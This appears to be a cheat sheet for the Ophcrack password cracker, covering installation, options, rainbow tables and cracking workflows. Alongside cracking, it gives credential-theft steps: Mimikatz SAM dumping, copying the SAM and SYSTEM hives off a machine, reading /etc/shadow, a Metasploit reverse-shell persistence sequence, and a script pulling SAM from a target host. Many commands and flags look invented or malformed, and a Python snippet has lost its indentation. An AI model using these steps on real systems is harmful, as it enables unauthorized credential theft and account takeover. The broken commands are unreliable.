Ophcrack is a Windows password cracker that uses rainbow tables to quickly recover plaintext passwords from LM and NTLM hashes. It supports cracking passwords from Windows systems by dumping and analyzing password hashes. Ophcrack can work standalone or with tools like Ophcrack Live to crack passwords on Windows systems without booting the OS.
The tool combines efficient rainbow table lookups with additional brute-force capabilities for remaining passwords. It’s commonly used in penetration testing, incident response, and authorized password recovery scenarios.
1. Download installer from ophcrack.sourceforge.net
2. Run installer (ophcrack-3.8.0-installer.exe)
3. Follow installation wizard
4. Launch Ophcrack from Start Menu
sudo apt-get update
sudo apt-get install ophcrack ophcrack-data
sudo yum install ophcrack
# or
sudo dnf install ophcrack
# Install dependencies
sudo apt-get install build-essential cmake libqt4-dev libssl-dev
# Download source
wget https://sourceforge.net/projects/ophcrack/files/ophcrack/3.8.0/ophcrack-3.8.0.tar.bz2
tar -xjf ophcrack-3.8.0.tar.bz2
cd ophcrack-3.8.0
# Build
cmake .
make
sudo make install
sudo apt-get install ophcrack ophcrack-data
# Build Docker image
docker build -t ophcrack .
# Run with GUI (requires X11)
docker run -it --rm -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix ophcrack
ophcrack --version
ophcrack --help
| Concept | Description |
|---|
| Rainbow Table | Precomputed hash-to-password mappings for fast lookup |
| NTLM Hash | Modern Windows hash format (MD4-based) |
| LM Hash | Legacy Windows hash format (DES-based) |
| Hash Chain | Chain of computation for rainbow table |
| Reduction Function | Mathematical function for rainbow table generation |
| Brute-Force | Systematic password generation and testing |
| Lookup | Fast password retrieval from rainbow tables |
| Coverage | Percentage of password space covered by tables |
| Command | Description |
|---|
ophcrack -h | Show help message |
ophcrack --version | Display version |
ophcrack -f <file> | Load hash file |
ophcrack -d <dir> | Specify rainbow table directory |
ophcrack -n <num> | Use N threads for cracking |
ophcrack -l | List available rainbow tables |
ophcrack -g | GUI mode |
ophcrack -c | Console mode |
# Start GUI interface
ophcrack -g
# or
ophcrack
1. Load NTLM Hashes
- From File → Select hash file
- Import SAM dump
- Paste hashes manually
2. Select Rainbow Tables
- Choose table sets (XP, Vista, 7, etc.)
- Verify table locations
- Enable/disable specific tables
3. Start Cracking
- Click "Crack" button
- Monitor progress
- View cracked passwords
4. Export Results
- Save results to file
- Copy passwords
- Generate report
# Basic cracking
ophcrack -f hashes.txt
# Specify rainbow table directory
ophcrack -f hashes.txt -d /path/to/tables/
# Use specific number of threads
ophcrack -f hashes.txt -n 4
# Verbose output
ophcrack -f hashes.txt -v
# Format: username:RID:LM_HASH:NTLM_HASH
Administrator:500:00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
User:1000:e52cac67419a6a9a42f8b3674a46f670:8846f7eaee8fb117ad06bdd830b7586c
# Run Mimikatz to extract hashes
mimikatz.exe
# In mimikatz prompt
privilege::debug
token::elevate
sam::dump
# Output will show NTLM hashes
# Extract from SAM/SYSTEM
hashcat-tools pwdump.pl
sudo ./pwdump.pl > hashes.txt
# Output hashes for Ophcrack
# Copy SAM file (requires SYSTEM privileges)
copy C:\Windows\System32\config\SAM C:\temp\SAM
copy C:\Windows\System32\config\SYSTEM C:\temp\SYSTEM
# Use on attacker machine
samdump2 SYSTEM SAM > hashes.txt
# Unshadow combining /etc/passwd and /etc/shadow
unshadow /etc/passwd /etc/shadow > crackable.txt
# Create Ophcrack-compatible format (convert to MD5/NTLM)
john --format=md5 --wordlist=rockyou.txt crackable.txt
| Table Set | Target | Coverage | Size |
|---|
| XP Free | WinXP/2003 | 99.9% (8 chars) | ~700 MB |
| XP Special | WinXP/2003 | 99.9% (8 chars special) | ~1 GB |
| Vista Free | Vista/7/8 | 99.9% (8 chars) | ~700 MB |
| Vista Special | Vista/7/8 | 99.9% (8 chars special) | ~1 GB |
| 7 Free | Windows 7 | 99.9% (8 chars) | ~700 MB |
| 7 Special | Windows 7 | 99.9% (8 chars special) | ~1 GB |
| Strongsalt Free | Any | 99.9% (8 chars) | ~700 MB |
# Official Ophcrack site (free tables)
# https://ophcrack.sourceforge.io/tables.php
# Command-line download
wget https://sourceforge.net/projects/ophcrack/files/tables/...
# Mount rainbow tables
mkdir -p /opt/ophcrack/tables
tar -xzf ophcrack_tables.tar.gz -C /opt/ophcrack/tables/
# Create configuration
vi ~/.ophcrack/ophcrack.conf
# Add table directories
[rainbow_tables]
path = /opt/ophcrack/tables/xp_free/
path = /opt/ophcrack/tables/vista_free/
# Verify tables
ophcrack -l
# Crack single NTLM hash
echo "username:500:00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c" > single.txt
ophcrack -f single.txt
# Crack multiple hashes from file
ophcrack -f hashes.txt --batch
# Output all results to file
ophcrack -f hashes.txt --batch --output results.txt
# Multi-threaded cracking
ophcrack -f hashes.txt -n 8
# Fast mode (less accurate)
ophcrack -f hashes.txt --fast
# Thorough mode (more accurate)
ophcrack -f hashes.txt --thorough
# Specify rainbow table directory
ophcrack -f hashes.txt -d /mnt/rainbow_tables/
# 1. Extract hashes from compromised system
dumped-hashes.txt contains SAM dumps
# 2. Convert to Ophcrack format
python3 -c "
import sys
for line in sys.stdin:
parts = line.strip().split(':')
user = parts[0]
ntlm = parts[3]
print(f'{user}:1000::::::{ntlm}')
" < sam_dump.txt > ophcrack_input.txt
# 3. Crack with Ophcrack
ophcrack -f ophcrack_input.txt
# 4. Recover plaintext passwords
# Monitor progress and collect results
# Collect system hashes
# From forensic image or live system
imager extract SAM
# Process with Ophcrack
ophcrack -f forensic_hashes.txt --batch --output report.txt
# Analyze results for indicators
grep -v "^#" report.txt | grep -v "Cracking" > recovered_passwords.txt
# Authorized password recovery scenario
# 1. Boot with Ophcrack Live USB
# 2. Automatic SAM detection
# 3. Password cracking begins
# 4. Passwords displayed after cracking
# Extract hashes for hashcat
ophcrack -f hashes.txt --hash-only > hashes.hashcat
# Run hashcat for remaining hashes
hashcat -m 1000 -a 3 hashes.hashcat ?a?a?a?a?a?a?a?a
# Extract NTLM hashes
hashcat-tools pwdump.pl > hashes.txt
# Try Ophcrack first (fast with rainbow tables)
ophcrack -f hashes.txt
# Then John for remaining
john --format=NT --wordlist=rockyou.txt hashes.txt
# Generate payload for SAM dump
msfconsole
use exploit/windows/local/persistence_service
set PAYLOAD windows/shell_reverse_tcp
# Dump SAM
set post/windows/gather/hashdump
run
# Convert and crack with Ophcrack
ophcrack -f dumped_hashes.txt
# NVIDIA GPU support (with CUDA)
# Recompile with CUDA support
cmake . -DUSE_CUDA=ON
make
# Run with GPU
ophcrack -f hashes.txt --gpu
# Choose appropriate tables for target
# Windows XP/2003: Use XP tables
ophcrack -f hashes.txt -d /tables/xp_free/
# Windows 7/8: Use 7 tables
ophcrack -f hashes.txt -d /tables/7_free/
# Unknown: Try multiple table sets
ophcrack -f hashes.txt -d /tables/
# Use multiple threads
ophcrack -f hashes.txt -n 16
# Distribute across machines
# Each instance processes different hash subset
# Combine results manually
# Limit memory usage
ophcrack -f hashes.txt --max-memory 2G
# CPU thread allocation
ophcrack -f hashes.txt -n 4 # 4 threads
# Monitor performance
ophcrack -f hashes.txt -n 8 --monitor
# Remove duplicates
sort -u hashes.txt > hashes_unique.txt
ophcrack -f hashes_unique.txt
# Remove already-cracked entries
grep "^#" previous_results.txt | cut -d: -f3 > cracked_hashes.txt
comm -23 <(sort hashes.txt | cut -d: -f3) <(sort cracked_hashes.txt) > remaining.txt
Loaded 5 hashes
Starting cracking...
[████████████░░░░░░░░░░░░░░] 45%
Results:
admin: Password123 [CRACKED]
user: [NOT FOUND]
guest: [blank password] [CRACKED]
test: abc123 [CRACKED]
[CRACKED] - Password found in rainbow tables
[NOT FOUND] - Not in tables, couldn't crack
[EMPTY] - No password (blank)
[DISABLED] - Account disabled
# Save results to file
ophcrack -f hashes.txt --output results.txt
# Parse results
cat results.txt | grep "CRACKED" | cut -d: -f1,2
# Count success rate
grep "CRACKED" results.txt | wc -l
total_hashes=$(wc -l < hashes.txt)
echo "Success: $(grep -c CRACKED results.txt)/$total_hashes"
- Use only on systems you own or have authorization to test
- Secure cracked passwords and results
- Consider privacy implications of password recovery
- Maintain audit trails of cracking operations
- Dispose of password lists securely
- Follow organizational security policies
- Respect legal and regulatory requirements
# Possible causes:
# 1. Rainbow table doesn't have password
# 2. Password outside character set
# 3. Password longer than table supports
# Workarounds:
# - Get larger rainbow tables
# - Use brute-force (slower)
# - Use hashcat with GPU
# - Dictionary + rules with John
# Check table coverage
# Most tables: 99.9% for 8 characters
# Longer passwords less likely to crack
# Special characters: Use special table sets
# Calculate likelihood
# LM: Only 7 uppercase, high crack rate
# NTLM: Full character set, lower rate for long passwords
# If cracking is slow:
# 1. Allocate more CPU threads
# 2. Use GPU acceleration (NVIDIA)
# 3. Optimize rainbow table paths (SSD)
# 4. Reduce number of simultaneous hashes
# Verify table locations
ls -la /opt/ophcrack/tables/
# Configure paths
ophcrack -d /path/to/tables/
# Check configuration file
cat ~/.ophcrack/ophcrack.conf
# Install Qt dependencies
sudo apt-get install libqt4-gui
# Run in console mode
ophcrack -f hashes.txt -c
# Check for display server
echo $DISPLAY
# Correct hash format
username:RID:LM_HASH:NTLM_HASH
# Validate format
grep -E "^[^:]+:[0-9]+:[A-F0-9]{32}:[A-F0-9]{32}$" hashes.txt
# Convert from other tools
hashcat-tools prepare_hashes.sh input.txt > ophcrack_format.txt
# Generate custom tables
rainbowcrack genrt -t <hash_type> -c <charset> -l <min_len> -m <max_len> -s <start> -e <end>
# Example: SHA-1 tables
rainbowcrack genrt -t sha1 -c /PATH/TO/charset/mixalpha-numeric#1-8 \
-l 1 -m 8 -s 0 -e 100000000 myrt
#!/bin/bash
# Automated hash cracking workflow
# 1. Extract hashes
source_system="target.example.com"
scp admin@$source_system:/backup/SAM .
# 2. Convert format
samdump2 SYSTEM SAM > hashes.txt
# 3. Crack with Ophcrack
ophcrack -f hashes.txt --batch --output results.txt
# 4. Parse and report
echo "=== Password Crack Results ===" > report.txt
echo "Total Hashes: $(wc -l < hashes.txt)" >> report.txt
echo "Cracked: $(grep -c CRACKED results.txt)" >> report.txt
echo "" >> report.txt
grep CRACKED results.txt >> report.txt
- Hashcat - GPU-accelerated password cracker
- John the Ripper - CPU-based password cracker
- Mimikatz - Credential extraction tool
- Hashtools - Hash utilities and conversion
- Rainbowcrack - Rainbow table generator
- Cain & Abel - Windows password recovery
